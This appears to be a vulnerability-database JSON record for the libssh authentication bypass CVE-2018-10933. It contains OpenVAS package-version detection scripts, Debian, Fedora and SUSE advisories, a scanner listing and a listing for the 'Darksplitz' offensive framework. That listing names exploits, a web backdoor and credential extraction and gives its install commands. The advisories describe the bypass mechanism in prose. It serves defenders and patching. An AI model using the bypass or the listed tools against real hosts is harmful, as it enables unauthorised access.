value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00032.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libssh'\n package(s) announced via the openSUSE-SU-2018:3200-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for libssh fixes the following issues:\n\n - CVE-2018-10933: Fixed a server mode authentication bypass (bsc#1108020).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1180=1\");\n\n script_tag(name:\"affected\", value:\"libssh on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libssh-debugsource\", rpm:\"libssh-debugsource~0.7.5~lp150.5.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh-devel\", rpm:\"libssh-devel~0.7.5~lp150.5.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh-devel-doc\", rpm:\"libssh-devel-doc~0.7.5~lp150.5.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh4\", rpm:\"libssh4~0.7.5~lp150.5.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh4-debuginfo\", rpm:\"libssh4-debuginfo~0.7.5~lp150.5.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh4-32bit\", rpm:\"libssh4-32bit~0.7.5~lp150.5.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh4-32bit-debuginfo\", rpm:\"libssh4-32bit-debuginfo~0.7.5~lp150.5.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:32:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-10-21T00:00:00", "id": "OPENVAS:1361412562310875208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875208", "type": "openvas", "title": "Fedora Update for libssh FEDORA-2018-c08cd808d3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_c08cd808d3_libssh_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libssh FEDORA-2018-c08cd808d3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875208\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-21 07:11:07 +0200 (Sun, 21 Oct 2018)\");\n script_cve_id(\"CVE-2018-10933\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libssh FEDORA-2018-c08cd808d3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libssh on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-c08cd808d3\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4FCH3A4CTFHZMBFM64FQEG7NQ2CDYKGJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libssh\", rpm:\"libssh~0.8.4~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:33:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-10-21T00:00:00", "id": "OPENVAS:1361412562310875215", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875215", "type": "openvas", "title": "Fedora Update for libssh FEDORA-2018-bca1c1ab49", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_bca1c1ab49_libssh_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libssh FEDORA-2018-bca1c1ab49\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875215\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-21 07:27:19 +0200 (Sun, 21 Oct 2018)\");\n script_cve_id(\"CVE-2018-10933\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libssh FEDORA-2018-bca1c1ab49\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libssh on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-bca1c1ab49\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UWLICQ26SDX7QQ4UCKVJ3KETSA5FUSJE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libssh\", rpm:\"libssh~0.7.6~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-29T20:06:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "Peter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH\nlibrary, contains an authentication bypass vulnerability in the server\ncode. An attacker can take advantage of this flaw to successfully\nauthenticate without any credentials by presenting the server an\nSSH2_MSG_USERAUTH_SUCCESS message in place of the\nSSH2_MSG_USERAUTH_REQUEST message which the server would expect to\ninitiate authentication.", "modified": "2020-01-29T00:00:00", "published": "2018-10-19T00:00:00", "id": "OPENVAS:1361412562310891548", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891548", "type": "openvas", "title": "Debian LTS: Security Advisory for libssh (DLA-1548-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891548\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-10933\");\n script_name(\"Debian LTS: Security Advisory for libssh (DLA-1548-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-19 00:00:00 +0200 (Fri, 19 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/10/msg00010.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"libssh on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n0.6.3-4+deb8u3.\n\nWe recommend that you upgrade your libssh packages.\");\n\n script_tag(name:\"summary\", value:\"Peter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH\nlibrary, contains an authentication bypass vulnerability in the server\ncode. An attacker can take advantage of this flaw to successfully\nauthenticate without any credentials by presenting the server an\nSSH2_MSG_USERAUTH_SUCCESS message in place of the\nSSH2_MSG_USERAUTH_REQUEST message which the server would expect to\ninitiate authentication.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-4\", ver:\"0.6.3-4+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-dbg\", ver:\"0.6.3-4+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-dev\", ver:\"0.6.3-4+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-doc\", ver:\"0.6.3-4+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-gcrypt-4\", ver:\"0.6.3-4+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-gcrypt-dev\", ver:\"0.6.3-4+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:33:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310843662", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843662", "type": "openvas", "title": "Ubuntu Update for libssh USN-3795-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3795_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for libssh USN-3795-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843662\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-18 06:28:43 +0200 (Thu, 18 Oct 2018)\");\n script_cve_id(\"CVE-2018-10933\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for libssh USN-3795-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Peter Winter-Smith discovered that libssh incorrectly handled\nauthentication when being used as a server. A remote attacker could use\nthis issue to bypass authentication without any credentials.\");\n script_tag(name:\"affected\", value:\"libssh on Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3795-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3795-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssh-4\", ver:\"0.6.1-0ubuntu3.4\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssh-4\", ver:\"0.8.0~20170825.94fa1e38-1ubuntu0.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssh-4\", ver:\"0.6.3-4.3ubuntu0.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "kitploit": [{"lastseen": "2020-12-08T13:22:21", "bulletinFamily": "tools", "cvelist": ["CVE-2018-10933"], "description": "[  ](<https://1.bp.blogspot.com/-eNbaXIVtvfc/W8lUwAVAYeI/AAAAAAAAM9A/xgRVeVhL7kwfd286pz1yb3wK_7JkzaBUwCLcBGAs/s1600/libssh-scanner.png>)\n\n \n\n\nThis is a python based script to identify hosts [ vulnerable ](<https://www.kitploit.com/search/label/Vulnerable>) to CVE-2018-10933. \n\nThe [ vulnerability ](<https://www.kitploit.com/search/label/Vulnerability>) is present on versions of libssh 0.6+ and was remediated by a patch present in libssh 0.7.6 and 0.8.4. For more details: [ https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/ ](<https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/>)\n\n \n** Help ** \n\n \n \n CVE-2018-10933 [Scanner](<https://www.kitploit.com/search/label/Scanner>) - Find vulnerable libssh services by Leap Security (@LeapSecurity)\n \n optional arguments:\n -h, --help show this help message and exit\n -v, --version show program's version number and exit\n -t TARGET, --target TARGET\n An ip address or new line delimited file containing\n IPs to banner grab for the vulnerability.\n -p PORT, --port PORT Set port of [SSH](<https://www.kitploit.com/search/label/SSH>) service\n\n \n \n\n\n** [ Download Libssh-Scanner ](<https://github.com/leapsecurity/libssh-scanner>) **\n", "edition": 19, "modified": "2018-10-19T12:51:06", "published": "2018-10-19T12:51:06", "id": "KITPLOIT:8529485066024736775", "href": "http://www.kitploit.com/2018/10/libssh-scanner-script-to-identify-hosts.html", "title": "LibSSH Scanner - Script To Identify Hosts Vulnerable To CVE-2018-10933", "type": "kitploit", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-12-08T17:24:24", "bulletinFamily": "tools", "cvelist": ["CVE-2018-7600", "CVE-2018-9206", "CVE-2018-4407", "CVE-2018-10933", "CVE-2018-14847"], "description": "[  ](<https://2.bp.blogspot.com/-WrSl3k8acz8/XKK-mOdvWPI/AAAAAAAAOaA/AhYa9ilCzBkxcfAhNbVH3l5YsgRSvL6tgCLcBGAs/s1600/Darksplitz.png>)\n\n \nThis tools is continued from Nefix, DirsPy and Xmasspy project. \n \n** Installation ** \nWill work fine in the [ debian ](<https://www.kitploit.com/search/label/Debian> \"debian\" ) shade operating system, like Backbox, Ubuntu or Kali linux. \n\n\n 1. ` $ git clone https://github.com/koboi137/darksplitz `\n 2. ` $ cd darksplitz/ `\n 3. ` $ sudo ./install.sh `\n \n** Features ** \n\n\n * Extract [ mikrotik ](<https://www.kitploit.com/search/label/MikroTik> \"mikrotik\" ) credential (user.dat) \n * Password generator \n * Reverse IP lookup \n * Mac address sniffer \n * Online md5 cracker \n * Mac address lookup \n * Collecting url from web.archive.org \n * Web [ backdoor ](<https://www.kitploit.com/search/label/Backdoor> \"backdoor\" ) (Dark Shell) \n * Winbox exploit (CVE-2018-14847) \n * ChimeyRed exploit for mipsbe (Mikrotik) \n * Exploit web application \n * Mass apple dos (CVE-2018-4407) \n * Libssh exploit (CVE-2018-10933) \n * Discovering Mikrotik device \n * Directory scanner \n * Subdomain scanner \n * Mac address scanner \n * Mac address pinger \n * Vhost [ scanner ](<https://www.kitploit.com/search/label/Scanner> \"scanner\" ) (bypass cloudflare) \n * Mass [ bruteforce ](<https://www.kitploit.com/search/label/Bruteforce> \"bruteforce\" ) (wordpress) \n * Interactive msfrpc client \n \n** Exploit web application ** \n\n\n * plUpload file upload \n * jQuery file upload (CVE-2018-9206) \n * Laravel (.env) \n * sftp-config.json (misc) \n * Wordpress register (enable) \n * elfinder file upload \n * Drupal 7 exploit (CVE-2018-7600) \n * Drupal 8 exploit (CVE-2018-7600) \n * com_fabrik exploit (joomla) \n * gravityform plugin file upload (wordpress) \n * geoplace3 plugin file upload (wordpress) \n * peugeot-music plugin file upload (wordpress) \n \n** Notes ** \nThis tool will work fine under root, because scapy module and other need root user to access more features. But you can run as user too in some features. ;) \n \n \n\n\n** [ Download Darksplitz ](<https://github.com/koboi137/darksplitz> \"Download Darksplitz\" ) **\n", "edition": 22, "modified": "2019-04-04T21:12:09", "published": "2019-04-04T21:12:09", "id": "KITPLOIT:5494076556436489947", "href": "http://www.kitploit.com/2019/04/darksplitz-exploit-framework.html", "title": "Darksplitz - Exploit Framework", "type": "kitploit", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2018-10-19T20:30:53", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "This update for libssh fixes the following security issue:\n\n - CVE-2018-10933: Fixed a server mode authentication bypass (boo#1108020).\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "edition": 1, "modified": "2018-10-19T18:22:47", "published": "2018-10-19T18:22:47", "id": "OPENSUSE-SU-2018:3245-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00042.html", "title": "Security update for libssh (important)", "type": "suse", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-17T20:48:16", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "This update for libssh fixes the following issues:\n\n - CVE-2018-10933: Fixed a server mode authentication bypass (bsc#1108020).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-10-17T18:09:57", "published": "2018-10-17T18:09:57", "id": "OPENSUSE-SU-2018:3200-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00032.html", "title": "Security update for libssh (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "The ssh library was designed to be used by programmers needing a working SSH implementation by the mean of a library. The complete control of the client is made by the programmer. With libssh, you can remotely execute programs, tra nsfer files, use a secure and transparent tunnel for your remote programs. With i ts Secure FTP implementation, you can play with remote files easily, without third-party programs others than libcrypto (from openssl). ", "modified": "2018-10-30T17:47:50", "published": "2018-10-30T17:47:50", "id": "FEDORA:55A7666B320C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: libssh-0.8.4-1.fc29", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "The ssh library was designed to be used by programmers needing a working SSH implementation by the mean of a library. The complete control of the client is made by the programmer. With libssh, you can remotely execute programs, tra nsfer files, use a secure and transparent tunnel for your remote programs. With i ts Secure FTP implementation, you can play with remote files easily, without third-party programs others than libcrypto (from openssl). ", "modified": "2018-10-20T23:52:20", "published": "2018-10-20T23:52:20", "id": "FEDORA:80E92629592B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libssh-0.8.4-1.fc28", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "The ssh library was designed to be used by programmers needing a working SSH implementation by the mean of a library. The complete control of the client is made by the programmer. With libssh, you can remotely execute programs, tra nsfer files, use a secure and transparent tunnel for your remote programs. With i ts Secure FTP implementation, you can play with remote files easily, without third-party programs others than libcrypto (from openssl). ", "modified": "2018-10-21T00:22:46", "published": "2018-10-21T00:22:46", "id": "FEDORA:140C962965AF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libssh-0.7.6-1.fc27", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "debian": [{"lastseen": "2020-08-12T00:51:31", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4322-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nOctober 17, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libssh\nCVE ID : CVE-2018-10933\nDebian Bug : 911149\n\nPeter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH\nlibrary, contains an authentication bypass vulnerability in the server\ncode. An attacker can take advantage of this flaw to successfully\nauthenticate without any credentials by presenting the server an\nSSH2_MSG_USERAUTH_SUCCESS message in place of the\nSSH2_MSG_USERAUTH_REQUEST message which the server would expect to\ninitiate authentication.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 0.7.3-2+deb9u1.\n\nWe recommend that you upgrade your libssh packages.\n\nFor the detailed security status of libssh please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/libssh\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 13, "modified": "2018-10-17T16:16:58", "published": "2018-10-17T16:16:58", "id": "DEBIAN:DSA-4322-1:3E74E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00253.html", "title": "[SECURITY] [DSA 4322-1] libssh security update", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-08-12T01:07:38", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "Package : libssh\nVersion : 0.6.3-4+deb8u3\nCVE ID : CVE-2018-10933\nDebian Bug : 911149\n\nPeter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH\nlibrary, contains an authentication bypass vulnerability in the server\ncode. An attacker can take advantage of this flaw to successfully\nauthenticate without any credentials by presenting the server an\nSSH2_MSG_USERAUTH_SUCCESS message in place of the\nSSH2_MSG_USERAUTH_REQUEST message which the server would expect to\ninitiate authentication.\n\nFor Debian 8 "Jessie", this problem has been fixed in version\n0.6.3-4+deb8u3.\n\nWe recommend that you upgrade your libssh packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams\n", "edition": 9, "modified": "2018-10-18T14:28:53", "published": "2018-10-18T14:28:53", "id": "DEBIAN:DLA-1548-1:63B91", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201810/msg00010.html", "title": "[SECURITY] [DLA 1548-1] libssh security update", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:50", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10933"], "description": "\ngladiac reports:\n\nlibssh versions 0.6 and above have an authentication bypass\n\t vulnerability in the server code. By presenting the server an\n\t SSH2_MSG_USERAUTH_SUCCESS message in place of the\n\t SSH2_MSG_USERAUTH_REQUEST message which the server would expect to\n\t initiate authentication, the attacker could successfully 